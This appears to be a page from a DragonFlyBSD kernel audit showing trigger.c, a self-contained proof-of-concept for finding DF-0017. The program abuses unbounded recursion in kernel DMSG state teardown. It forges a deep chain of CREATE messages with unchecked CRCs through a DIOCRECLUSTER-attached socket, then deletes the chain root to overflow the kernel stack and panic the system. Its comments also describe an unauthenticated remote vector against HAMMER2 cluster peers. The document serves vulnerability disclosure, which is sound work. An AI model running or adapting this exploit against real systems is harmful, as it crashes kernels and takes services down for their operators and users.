โฌข DragonFlyBSD Kernel Audit
DF-0017 / trigger.c
โ† back to finding โ†“ download raw
/*
 * DF-0017 PoC (self-contained trigger) โ€” kdmsg unbounded recursion ->
 * kernel thread stack overflow (DoS).
 *
 * Bug: kdmsg_simulate_failure() (sys/kern/kern_dmsg.c:1321) recurses through
 *   state->subq with NO depth limit (recursive call at kern_dmsg.c:1346).
 *   kdmsg_state_dying() (kern_dmsg.c:1421) does the same (recursive call at
 *   :1428).  A DMSG peer builds an arbitrarily deep parent->child chain via
 *   CREATE messages whose `circuit` references the previous state's msgid
 *   (child linked at kern_dmsg.c:917).  Triggering teardown โ€” a DELETE on the
 *   chain root (kdmsg_state_cleanuprx at kern_dmsg.c:1255 calls
 *   kdmsg_simulate_failure) or closing the connection (write-thread teardown
 *   at kern_dmsg.c:555) โ€” recurses depth-first through the whole chain and
 *   overflows the 16 KB LWKT kernel thread stack
 *   (UPAGES*PAGE_SIZE = 4*4096, sys/sys/thread.h), panicking the kernel.
 *
 *   struct kdmsg_state (sys/sys/dmsg.h:735) has NO depth/nesting field โ€” the
 *   recursion is genuinely unbounded.  The receive path
 *   (kdmsg_iocom_thread_rd, kern_dmsg.c:326) does NOT verify hdr_crc/aux_crc,
 *   so forged messages are accepted.
 *
 * Setup solved: a DMSG iocom fd is attached to the kernel's disk-iocom parser
 *   by issuing DIOCRECLUSTER (sys/sys/diskslice.h) on a raw disk device node,
 *   passing one end of an AF_UNIX socketpair.  The kernel's reader thread then
 *   parses whatever we write to the other end as DMSG wire messages.  This
 *   requires permission to open the disk device (root / operator group); on
 *   this guest /dev/vbd0 is root:operator crw-r----- so unprivileged users
 *   cannot trigger the LOCAL vector.  (The REMOTE vector โ€” a HAMMER2 cluster
 *   peer feeding these messages over the network โ€” is unauthenticated because
 *   LNK_AUTH is unimplemented, making it a remote DoS for clustered deploys.)
 *
 * Build (DragonFly):  cc -o trigger trigger.c -lpthread
 *
 * Run (as root):  ./trigger [depth]            (default depth 300)
 *   depth = number of chained CREATE messages (>= ~100 overflows 16 KB stack)
 *
 * Expected (bug present): kernel panic โ€” double-fault / "supervisor read,
 *   page not present" / explicit stack-guard trap โ€” with a backtrace full of
 *   kdmsg_simulate_failure / kdmsg_state_dying / kdmsg_state_abort frames.
 *   On a fixed kernel (depth cap) the messages are processed normally and the
 *   process exits cleanly (no panic).
 *
 * WARNING: panics / corrupts the kernel stack on a vulnerable kernel.  Run
 * only on a disposable VM.
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/diskslice.h>	/* DIOCRECLUSTER, struct disk_ioc_recluster */
#include <sys/dmsg.h>
#include <sys/socket.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>

#define DMSG_DISK	"/dev/vbd0"

/* Build a minimal 64-byte dmsg header (no aux). */
static void
mk_dmsg(void *buf, uint32_t cmd, uint64_t msgid, uint64_t circuit)
{
	dmsg_hdr_t *h = buf;
	memset(buf, 0, 64);
	h->magic = DMSG_HDR_MAGIC;	/* 0x4832 */
	h->cmd = cmd;
	h->msgid = msgid;
	h->circuit = circuit;
	h->aux_bytes = 0;
	/* hdr_crc / aux_crc are NOT verified on receive -> any value works */
	h->hdr_crc = 0;
	h->aux_crc = 0;
}

/* Drain thread: read & discard whatever the kernel writes back (LNK_CONN,
 * NOSUPP replies, LNK_PING...) so the socket send buffer never fills and
 * deadlocks the kernel's writer thread. */
static void *
drain(void *arg)
{
	int fd = *(int *)arg;
	char buf[4096];
	for (;;)
		if (read(fd, buf, sizeof(buf)) <= 0)
			break;
	return NULL;
}

int
main(int argc, char **argv)
{
	setvbuf(stderr, NULL, _IONBF, 0);
	int depth = 300;		/* >> ~100 needed to overflow 16 KB stack */
	if (argc >= 2)
		depth = atoi(argv[1]);
	if (depth < 1)
		depth = 1;

	/* --- 1. open the raw disk device (needs root/operator) --- */
	int diskfd = open(DMSG_DISK, O_RDWR);
	if (diskfd < 0)
		err(1, "open %s (need root/operator for DIOCRECLUSTER)", DMSG_DISK);
	fprintf(stderr, "[1] opened %s fd=%d\n", DMSG_DISK, diskfd);

	/* --- 2. socketpair: kernel reads end[0], we write end[1] --- */
	int sv[2];
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		err(1, "socketpair");
	fprintf(stderr, "[2] socketpair sv[%d,%d]\n", sv[0], sv[1]);

	/* drain kernel->us traffic so the kernel writer never blocks */
	pthread_t dt;
	fprintf(stderr, "[2a] creating drain thread\n");
	pthread_create(&dt, NULL, drain, &sv[1]);
	fprintf(stderr, "[2b] drain thread started\n");

	/* --- 3. attach sv[0] to the disk's DMSG iocom --- */
	struct disk_ioc_recluster recl;
	memset(&recl, 0, sizeof(recl));
	recl.fd = sv[0];
	fprintf(stderr, "[2c] issuing DIOCRECLUSTER (recl.fd=%d)...\n", recl.fd);
	if (ioctl(diskfd, DIOCRECLUSTER, &recl) < 0)
		err(1, "DIOCRECLUSTER");
	fprintf(stderr, "[3] DIOCRECLUSTER ok\n");

	fprintf(stderr,
	    "[*] DMSG iocom attached; sending %d chained CREATEs + root DELETE\n",
	    depth);

	/* --- 4. build the deep chain: msgid=i is child of msgid=(i-1) --- */
	char buf[64];
	for (int i = 1; i <= depth; i++) {
		mk_dmsg(buf, DMSG_LNK_PAD | DMSGF_CREATE, (uint64_t)i,
		    (i == 1) ? 0ULL : (uint64_t)(i - 1));
		ssize_t w = write(sv[1], buf, sizeof(buf));
		if (w != (ssize_t)sizeof(buf))
			err(1, "write CREATE %d (rv=%zd)", i, w);
	}
	fprintf(stderr, "[4] wrote %d CREATEs\n", depth);

	/* --- 5. DELETE the chain root -> cleanuprx -> kdmsg_simulate_failure
	 * -> unbounded recursion -> stack overflow. */
	mk_dmsg(buf, DMSG_LNK_PAD | DMSGF_DELETE, 1ULL, 0ULL);
	ssize_t w = write(sv[1], buf, sizeof(buf));
	fprintf(stderr, "[5] wrote DELETE root (rv=%zd); waiting for panic...\n", w);

	/* give the kernel reader thread time to process the DELETE */
	sleep(3);
	fprintf(stderr, "[6] survived sleep(3); closing sv[1] to trigger EOF path\n");

	/* fallback trigger: closing sv[1] -> reader EOF -> write-thread teardown
	 * (kern_dmsg.c:555) kdmsg_simulate_failure(&state0) -> same recursion. */
	close(sv[1]);
	sleep(3);
	fprintf(stderr, "[7] survived; no panic observed\n");
	return 0;
}